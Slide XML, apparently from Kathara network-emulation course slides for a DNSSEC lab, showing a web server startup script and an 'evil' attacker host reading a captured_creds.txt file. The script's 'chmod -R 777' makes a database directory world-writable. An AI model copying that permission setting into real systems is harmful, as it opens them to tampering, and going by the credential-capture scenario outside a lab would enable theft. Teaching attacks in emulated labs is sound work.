                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R 777 /var/www/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rm -f /var/www/html/index.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>apache2ctl start</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>tail -f /dev/null</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F776031B-4CBD-6ADC-EB86-8FD38FE9CDB5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2716" cy="134"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 28132"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC6EA2F5-910C-88FD-01FC-24F47B583B4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F125EA90-53E9-14B7-B4B6-4D19F3B7EEB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F6BD11E-0452-434B-0388-398331CC0456}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383848210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BF1B19-D613-2FF0-7CFD-C0689E1DEB5E}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14453FB6-7C56-6BF6-1FF7-F3F58292B6AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="987993" y="2668276"/>
            <a:ext cx="10216014" cy="1521448"/>
            <a:chOff x="1364266" y="2378845"/>
            <a:chExt cx="10216014" cy="1521448"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF988FF3-5F4D-C0A3-0934-D0864348C5AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2668294"/>
              <a:ext cx="10216014" cy="1231999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /var/www/html/captured_creds.txt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE51263E-1C2B-A1EC-54C0-0FB9E484450A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2378845"/>
              <a:ext cx="10216014" cy="286249"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41E8A7B5-7F95-6C09-4DEF-85AB19E890FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B57FD093-3430-D49F-21D6-A342A497B04B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9649AA0F-E1E9-F727-F6CE-475F1FD64649}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F482323E-A117-9FB7-8D79-ADC2341B64B2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEBE911E-400F-10F8-11C0-8A5A11EADA36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>view hacker database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A62FFD05-B4F9-65DB-A820-B1B802BE4A83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73C1EF3E-0A1D-6BDD-F1F8-53C81550C1F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Rectangle 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62223B47-0EC1-B937-66CE-23DEB8C18697}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="6434123"/>
            <a:ext cx="181822" cy="371513"/>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endParaRPr lang="en-US" sz="1800" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266529618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2B6007-A2AD-DB95-8297-D603C566461A}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC801E2D-5942-F1CA-0D59-EB302024E37D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="987993" y="2668276"/>
            <a:ext cx="10216014" cy="1521448"/>
            <a:chOff x="1364266" y="2378845"/>
            <a:chExt cx="10216014" cy="1521448"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9B58B9C-D18D-7FD5-5745-1838CCB21F48}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2668294"/>
              <a:ext cx="10216014" cy="1231999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /var/www/html/captured_creds.txt</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>--- CAPTURE ---</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39800E7D-60C0-0C40-7CF3-85A7253AE97E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2378845"/>
              <a:ext cx="10216014" cy="286249"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
